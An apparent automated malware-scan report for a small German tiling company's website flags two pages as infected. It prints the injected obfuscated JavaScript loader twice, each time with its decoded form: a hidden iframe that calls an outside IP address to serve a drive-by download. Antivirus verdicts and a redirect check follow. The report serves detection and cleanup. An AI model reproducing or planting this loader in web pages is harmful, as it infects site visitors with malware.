New scan:

Malware Scanner report for marx-oha.com

Malicious/Suspicious/Total urls checked
2/0/10
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "marx-oha.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/2/4
2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=marx-oha.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://marx-oha.com/
200 OK
Content-Length: 6986
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v475aacdb5d314(v475aacdb5d93a){ function v475aacdb5dd17 () {var v475aacdb5e101=16; return v475aacdb5e101;} return(parseInt(v475aacdb5d93a,v475aacdb5dd17()));}function v475aacdb60c12(v475aacdb63ac1){ function v475aacdb6469d () {var v475aacdb64a74=2; return v475aacdb64a74;} var v475aacdb63ec6='';for(v475aacdb642a7=0; v475aacdb642a7<v475aacdb63ac1.length; v475aacdb642a7+=v475aacdb6469d()){ v475aacdb63ec6+=(String.fromCharCode(v475aacdb5d314(v475aacdb63ac1.substr(v475aacdb642a7, v475aacd
... 15 bytes are skipped ...
eturn v475aacdb63ec6;} document.write(v475aacdb60c12('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633163353463366265313061207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313036353232292B276434653231355C272077696474683D343832206865696768743D323231207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Decoded script:


<SCRIPT>window.status='Done';document.write('<iframe name=c1c54c6be10a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*106522)+'d4e215\' width=482 height=221 style=\'display: none\'></iframe>')</SCRIPT>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan-Downloader.HTML.Agent
K7AntiVirus
Riskware
Kaspersky
Trojan-Downloader.JS.Iframe.ys
Microsoft
TrojanDownloader:HTML/Agent.K
NANO-Antivirus
Trojan.Script.Agent.gcfu
VIPRE
Trojan-Clicker.HTML.IFrame (v)
F-Prot
JS/IFrame.A.gen
GData
HTML:Iframe-inf
Commtouch
JS/IFrame.A.gen

Hidden iFrame found.
size: 1x1     style: hidden
src: http://url

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>

http://marx-oha.com/index.htm
200 OK
Content-Length: 6986
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function v475aacdb5d314(v475aacdb5d93a){ function v475aacdb5dd17 () {var v475aacdb5e101=16; return v475aacdb5e101;} return(parseInt(v475aacdb5d93a,v475aacdb5dd17()));}function v475aacdb60c12(v475aacdb63ac1){ function v475aacdb6469d () {var v475aacdb64a74=2; return v475aacdb64a74;} var v475aacdb63ec6='';for(v475aacdb642a7=0; v475aacdb642a7<v475aacdb63ac1.length; v475aacdb642a7+=v475aacdb6469d()){ v475aacdb63ec6+=(String.fromCharCode(v475aacdb5d314(v475aacdb63ac1.substr(v475aacdb642a7, v475aacd
... 15 bytes are skipped ...
eturn v475aacdb63ec6;} document.write(v475aacdb60c12('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633163353463366265313061207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313036353232292B276434653231355C272077696474683D343832206865696768743D323231207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

Decoded script:


<SCRIPT>window.status='Done';document.write('<iframe name=c1c54c6be10a src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*106522)+'d4e215\' width=482 height=221 style=\'display: none\'></iframe>')</SCRIPT>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Trojan-Downloader.HTML.Agent
K7AntiVirus
Riskware
Kaspersky
Trojan-Downloader.JS.Iframe.ys
Microsoft
TrojanDownloader:HTML/Agent.K
NANO-Antivirus
Trojan.Script.Agent.gcfu
VIPRE
Trojan-Clicker.HTML.IFrame (v)
F-Prot
JS/IFrame.A.gen
GData
HTML:Iframe-inf
Commtouch
JS/IFrame.A.gen

Hidden iFrame found.
size: 1x1     style: hidden
src: http://url

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'>

http://marx-oha.com/referenzen.htm
200 OK
Content-Length: 5523
Content-Type: text/html
clean
http://marx-oha.com/fliesen.htm
200 OK
Content-Length: 5486
Content-Type: text/html
clean
http://marx-oha.com/sanierung.htm
200 OK
Content-Length: 5493
Content-Type: text/html
clean
http://marx-oha.com/treppenbelaege.htm
200 OK
Content-Length: 5489
Content-Type: text/html
clean
http://marx-oha.com/kontakt.htm
200 OK
Content-Length: 5482
Content-Type: text/html
clean
http://marx-oha.com/test404page.js
404 Not Found
Content-Length: 958
Content-Type: text/html
clean
http://marx-oha.com/fliesen_2.htm
404 Not Found
Content-Length: 958
Content-Type: text/html
clean
http://marx-oha.com/referenzen_2.html
200 OK
Content-Length: 4800
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: marx-oha.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Jul 2014 18:41:10 GMT
Accept-Ranges: bytes
ETag: "786993-1b4a-4f0e1d7763a00"
Server: Apache/2
Content-Length: 6986
Content-Type: text/html
Last-Modified: Sun, 26 Jan 2014 16:11:20 GMT

...6986 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: marx-oha.com
Referer: http://www.google.com/search?q=marx-oha.com

Result:
The result is similar to the first query. There are no suspicious redirects found.